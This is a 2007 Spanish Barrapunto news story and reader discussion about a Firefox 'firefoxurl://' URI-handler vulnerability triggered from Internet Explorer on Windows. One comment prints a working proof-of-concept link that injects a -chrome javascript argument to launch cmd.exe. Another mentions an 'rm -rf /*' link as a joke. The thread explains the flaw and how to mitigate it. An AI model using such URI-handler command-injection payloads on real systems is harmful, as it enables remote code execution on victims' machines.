Historias
Slashboxes
Comentarios
Búsqueda

Nueva vulnerabilidad crítica en Firefox

editada por Candyman el 11 de Julio 2007, 16:57h   Printer-friendly   Email story
desde el dept. cross-browser-scripting
Seguridad Mozilla
purgossu nos cuenta: «Secunia ha publicado una vulnerabilidad crítica descubierta en Firefox 2.0.x, dando un total de 8 (sobre 12) agujeros de seguridad sin parchear (superando, por el momento, los de IE 7). El error, que aparentemente sólo afecta a la versión para Windows, se ejecuta al escribir una URL tipo "firefoxurl://" en Internet Explorer, pero sólo afecta al navegador libre. La única solución ofrecida hasta ahora es "no navegar por ninguna web que no sea de confianza" (o usar otro navegador más seguro :) ). Más información y pruebas de concepto.»

Historias relacionadas

[+] Descubiertas vulnerabilidades críticas en Photoshop 26 comentarios
purgossu nos cuenta: «Parece que es época de fallos críticos: si en esta misma semana fue el turno de Fx/IE, luego Java y después Flash, ahora le toca a la popular aplicación de diseño de Adobe. Los fallos de seguridad en cuestión podrían permitir a un atacante hacerse con el control del sistema tras abrir, empleando las versiones CS2 o CS3 de Photoshop, un archivo BMP, DIB, RLE o PNG con código malicioso. Ya se han publicado los parches de seguridad pertinentes en la web de Adobe.»
[+] Fallo de Firefox permite ejecución remota en Windows 78 comentarios
El pasado 25/07 se publicó una nueva vulnerabilidad crítica en el navegador Firefox que permite el control completo de una máquina Windows de forma remota. El fallo afecta a usuarios de Firefox que tengan además instalado el IE7... aunque según señala Billy (BK) Rios en su blog el fallo puede afectar a otros navegadores no basados en Mozilla. El problema se debe a la forma que tiene el sistema operativo Windows de tratar las URI incluídas en el registro, y que son pasadas a las aplicaciones sin validar. Rios recomienda a los desarrolladores no incluír URIs en el registro de Windows o deregistrar las que ya estén allí. Según Rios Mozilla Foundation ya ha tenía el parche como FIXED en el Bugzilla el día 24, al poco de notificarlo el mismo Ríos, así que los que los que usemos Firefox en Windows tendremos que estar atentos a no dejar pasar la actualización. Por si hay dudas, aquí tenéis la prueba de concepto de este fallo.
[+] Vulnerabilidad crítica de día cero en Mozilla Firefox 3.x 11 comentarios
Se ha descubierto una vulnerabilidad crítica en Firefox que afecta a todas las plataformas y que podría permitir la ejecución de código con un archivo XML especialmente manipulado. El equipo de desarrollo de Mozilla ha calificado la vulnerabilidad como crítica y urgente, y afirman que ya lo tienen solucionado (se trata simplemente del cambio de orden en una línea de código), pero que no publicarán Firefox 3.0.8 hasta principios de la semana que viene. Si el fallo es también reproducible en Thunderbird, es previsible que haya que esperar incluso más tiempo para que se publique una nueva versión. Elektro se hace también eco de la noticia en su bitácora. Los exploits de día cero son aquellos liberados antes de que se publiquen los parches, y por tanto existe una ventana de tiempo en que la vulnerabilidad puede ser explotada sin que haya parches para prevenirlo.
Este hilo ha sido archivado. No pueden publicarse nuevos comentarios.
Nueva vulnerabilidad crítica en Firefox | Log in/Crear cuenta | Top | 50 comentarios | Buscar hilo
Mostrar opciones Umbral:
Y recuerda: Los comentarios que siguen pertenecen a las personas que los han enviado. No somos responsables de los mismos.

  • La "única" solución

    (Puntos:3, Informativo)
    por bugmenot (27209) el Miércoles, 11 Julio de 2007, 17:17h (#932534)
    Ejem, pone que también puedes deshabilitar el manejador de "firefoxurl"
    • Re:La de purgossu (Puntos:2) Miércoles, 11 Julio de 2007, 18:15h
      • Re:La de purgossu (Puntos:2) Jueves, 12 Julio de 2007, 08:57h
      • 1 respuesta por debajo de tu umbral de lectura actual.

  • desde otro punto de vista

    (Puntos:2, Informativo)
    por knello (33938) el Miércoles, 11 Julio de 2007, 17:30h (#932544)
    en kriptopolis lo ven de otra manera: http://www.kriptopolis.org/explorer-firefox-rivale s-comparten-vulnerabilidad [kriptopolis.org]

  • ¿Y FirefoxHTML?

    (Puntos:2)
    por MaGaO (6286) <reversethis-{moc.toofgib} {ta} {oagam}> el Miércoles, 11 Julio de 2007, 17:37h (#932548)
    ( http://barrapunto.com/ | Última bitácora: Lunes, 19 Enero de 2009, 19:31h )
    Acabo de lanzar regedit y, al buscar "firefoxur", aparece HKEY_CLASSES_ROOT\FirefoxURL. Revisando HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command encuentro el texto

    ...\FIREFOX.EXE -url "%1" -requestPending

    pero este mismo comando aparece en HKEY_CLASSES_ROOT\FirefoxHTML\shell\open\command. ¿Es plausible que el problema se repita con ambas clases?

    --
    Marcos (cualquier parecido con la coincidencia es pura realidad)

  • ¿Windows?

    (Puntos:1, Divertido)
    por pobrecito hablador el Miércoles, 11 Julio de 2007, 17:37h (#932549)
    El error, que aparentemente sólo afecta a la versión para Windows"

    ¿Windows? ¿aun hay gente que usa eso? ;-P
    • Re:¿Windows? de pobrecito hablador (Puntos:1) Miércoles, 11 Julio de 2007, 18:13h
    • 2 respuestas por debajo de tu umbral de lectura actual.

  • Sólo si usas IE (u otro navegador no Firefox)

    (Puntos:2, Informativo)
    por Scarbrow (31251) el Miércoles, 11 Julio de 2007, 17:42h (#932552)
    ( Última bitácora: Miércoles, 23 Enero de 2008, 18:43h )
    Por lo que leo en la referencia, el problema es de tipo "cross-browser", es decir, que tienes que visitar una dirección afectada con el código malicioso con otro navegador, de modo que tu Firefox se vea afectado.

    Por otra parte recomiendan dos maneras sencillas de evitarlo: Desregistrar los firefoxurl o instalar http://noscript.net/ [noscript.net]

    De modo que aquellos que naveguen usando únicamente Firefox (a menos que mediante otra vulnerabilidad, esta vez del sistema, se consiga que se ejecute IE, apuntando a la URL maliciosa) están seguros, de hecho yo mismo he hecho la prueba de pinchar en el enlace usando Firefox y aparece una ventana de advertencia (vaaaaale, todos sabemos el caso que se le hace a estas ventanas, pero al menos aparece) de que se necesita lanzar una aplicación externa para manejar estos enlaces.
    --
    V.V.V.V.V. Vi Veri Vniversum Vivus Vici "Por el poder de la verdad, mientras viva habre conquistado el Universo"

  • La prueba de concepto...

    (Puntos:4, Informativo)
    por Radical Pagano (2246) el Miércoles, 11 Julio de 2007, 17:49h (#932554)
    ( Última bitácora: Lunes, 02 Julio de 2007, 09:38h )
    Ejecuta cmd.exe [firefoxurl]

    A mi no me ejecuta nada con la version 2.0.0.4 de windows. Sale un aviso como que va a ejecutar un programa externo (aceptar/cancelar) y dando aceptar abre otra ventana en blanco dentro del firefox.

    Ejecuta rm -rf /* [firefoxurl] Sin miedo, dicen que no funciona en linux!! xD

  • Bueno, que tampoco creo que sea para tanto

    (Puntos:2, Interesante)
    por jamarcko (26782) el Miércoles, 11 Julio de 2007, 18:12h (#932569)
    ( http://luixrodriguezneches.wordpress.com/ )
    Tampoco os alarméis. Recordad que la gracia del software libre como el de Mozilla estriba en que cualquiera participa, lo que significa que se detectan antes los errores (veremos qué tal les va a los chicos de Microsoft dentro de unos meses; dadles tiempo), lo que significa que se acometen antes y se solucionan antes, siempre y cuando mantengamos nuestras herramientas más críticas (que suelen ser las más útiles) debidamente actualizadas.
    Además, no es tan importante el número de errores de un software (aunque debo reconocer que es algo a tener en cuenta, por supuesto) como la GRAVEDAD de estos errores. Habría que ver la frecuencia con la que suceden y las consecuencias resultantes de los errores de cierto software...
    De todos modos no olvidéis que ningún software con la configuración de fábrica es seguro, así que es recomendable dedicarle 5 minutos a repasar la configuración del Firefox, del NoScript y de lo que sea, o sino no estaréis de ningún modo seguros.

    • Re:Bueno, que tampoco creo que sea para tanto

      (Puntos:5, Inspirado)
      por gothmog (15327) el Miércoles, 11 Julio de 2007, 19:14h (#932593)
      ( Última bitácora: Miércoles, 07 Enero de 2009, 15:58h )
      Alarmar? La justa y necesaria. Ni para desintalarlo ni para pasar olímpicamente y decir "bah, seguro que lo arreglan en seguida". Personalmente, esta vez me parece una vulnerabilidad un poco chorra, pero en general alucino con la forma de tratar que tienen algunos las vulnerabilidades en uno u otro navegador.

      • Internet explorer: como siempre, ya tardaban, pásate a fairfos men, que es to c00l!
      • Opera: buah, y lo que no habrá salido, porque es código cerrado, Y CON UN BANNER! pásate a fairfos men, que es to c00l y abierto
      • Safari: prfff, mierda macera, eso no es una beta, es una peta, es UN error en sí mismo, pásate a fairfos men, que es to c00l y no lo controla Apple
      • Konqueror: prfff, mierda kdeera, que usa librerías privativas y no soporta páginas pr0n, pásate a fairfos men, que es to c00l y libre de verdad
      • Firefox: bah, da igual, no es para tanto, en 24 horas está solucionado
      [ Padre ]

  • ¿Quién es más culpable?

    (Puntos:1)
    por Rutrus (28303) el Miércoles, 11 Julio de 2007, 18:45h (#932578)
    ( http://www.tecnolibres.com/ | Última bitácora: Jueves, 25 Septiembre de 2008, 22:25h )
    Vamos a ver, la noticia es que si pones firefoxurl:/nosequé desde Internet Explorer se abre firefox de forma insegura. Lo que hay que debatir es si la vulnerabilidad es de IE o de firefox.

    Como dicen arriba, en kriptopolis mencionan que hay un debate sobre ello.

    Yo no tengo tan claro que sea de firefox, aunque está claro que al menos en parte es problema suyo.

    Si tenemos en cuenta quién debe/puede hacer la modificación correspondiente la respuesta sería ambos, pero teniendo en cuenta que los programas no tienen porqué saber qué otros programas pueden ejecutarlos...
    --
    El software libre sólo muere cuando la última copia del código fuente es borrada.

  • Creo, sospecho

    (Puntos:3, Inspirado)
    por alexcomps (20255) el Miércoles, 11 Julio de 2007, 19:52h (#932613)
    ( http://www.hispaciencia.com/ | Última bitácora: Martes, 04 Noviembre de 2008, 18:50h )
    Que es culpa del IE. ¡¡EY, tranquilos!! No lo digo porque sea algo de Microsoft.

    Justificación:

    Enlace (tocho)

    firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.inte rfaces;file=C['@mozilla.org/file/local;1'].createI nstance(I.nsILocalFile);file.initWithPath('C:'+Str ing.fromCharCode(92)+String.fromCharCode(92)+'Wind ows'+String.fromCharCode(92)+String.fromCharCode(9 2)+'System32'+String.fromCharCode(92)+String.fromC harCode(92)+'cmd.exe');process=C['@mozilla.org/pro cess/util;1'].createInstance(I.nsIProcess);process .init(file);process.run(true%252c{}%252c0);alert(p rocess)
    Clave del registro:

    FIREFOX.EXE -url "%1" -requestPending
    Ese %1 se sustituye por lo que sigue al firefoxurl, supongo. O incluyéndolo. Lo mismo me da.

    Peeeero el problema está en que no se escapan las comillas, por lo que la que hay justo detrás de test cierra, a ojos del Firefox, el parámetro url, por lo que lo demás se interpreta como más parámetros.

    Usease. No se escapa la URL al pasarla como parametro: fallo del IE.
    --
    Omnes vulnerant, postuma necat.

  • Error en el título de la noticia.

    (Puntos:3, Interesante)
    por anv (15549) el Jueves, 12 Julio de 2007, 07:50h (#932749)
    ( http://barrapunto.com/ )
    La noticia dice que hay un bug en firefox. Sin embargo, es accesible sólo desde el explorer usando firefoxurl://. Eso deja una duda de quién tiene la culpa del problema.

    Pero, cuando vemos que el problema existe también con: irc://, aim://, hcp:// y mms://, ya se aclaran algunas dudas. Tenemos dos alternativas: que todas esas aplicaciones tengan errores de seguridad, o que el culpable del agujero sea Explorer. ¿Qué les parece?

  • V 2.0.0.5 solucionado

    (Puntos:1)
    por Scarbrow (31251) el Sábado, 21 Julio de 2007, 01:29h (#936381)
    ( Última bitácora: Miércoles, 23 Enero de 2008, 18:43h )
    Acabo de ver http://www.mozilla.org/security/announce/2007/mfsa 2007-23.html [mozilla.org] que ya se ha arreglado, junto con otras cuantas vulnerabilidades críticas
    --
    V.V.V.V.V. Vi Veri Vniversum Vivus Vici "Por el poder de la verdad, mientras viva habre conquistado el Universo"

  • Re:No entiendo

    (Puntos:3, Informativo)
    por MaGaO (6286) <reversethis-{moc.toofgib} {ta} {oagam}> el Miércoles, 11 Julio de 2007, 17:42h (#932551)
    ( http://barrapunto.com/ | Última bitácora: Lunes, 19 Enero de 2009, 19:31h )
    Según Kriptópolis y xs-sniper hay que lanzar el enlace problemático desde Internet Explorer para que salte, así que si no usas Internet Explorer para navegar puedes suponer que no va a pasar nada, en principio.
    --
    Marcos (cualquier parecido con la coincidencia es pura realidad)
    [ Padre ]
    • Re:No entiendo de gothmog (Puntos:2) Miércoles, 11 Julio de 2007, 19:06h
      • Re:No entiendo de bugmenot (Puntos:1) Miércoles, 11 Julio de 2007, 20:35h

  • Re:Demagogia

    (Puntos:1)
    por Rutrus (28303) el Miércoles, 11 Julio de 2007, 18:40h (#932575)
    ( http://www.tecnolibres.com/ | Última bitácora: Jueves, 25 Septiembre de 2008, 22:25h )
    La verdad es que sí, que la noticia es más propia de la milana esa que de un usuario de barrapunto.
    --
    El software libre sólo muere cuando la última copia del código fuente es borrada.
    [ Padre ]

  • Re:Adios

    (Puntos:1)
    por kornshell (33220) el Viernes, 13 Julio de 2007, 11:23h (#933272)
    El firefox tiene un fallo.
    El IE tiene un fallo.
    El fallo del firefox requiere del IE.
    El fallo del IE funciona con otros handlers aparte de firefoxurl.
    En el título de la noticia se menciona exclusivamente el firefox.

    Ahora, dime que realmente te parece fuera de lugar que se hable de la vulnerabilidad del IE.

    [ Padre ]
  • 5 respuestas por debajo de tu umbral de lectura actual.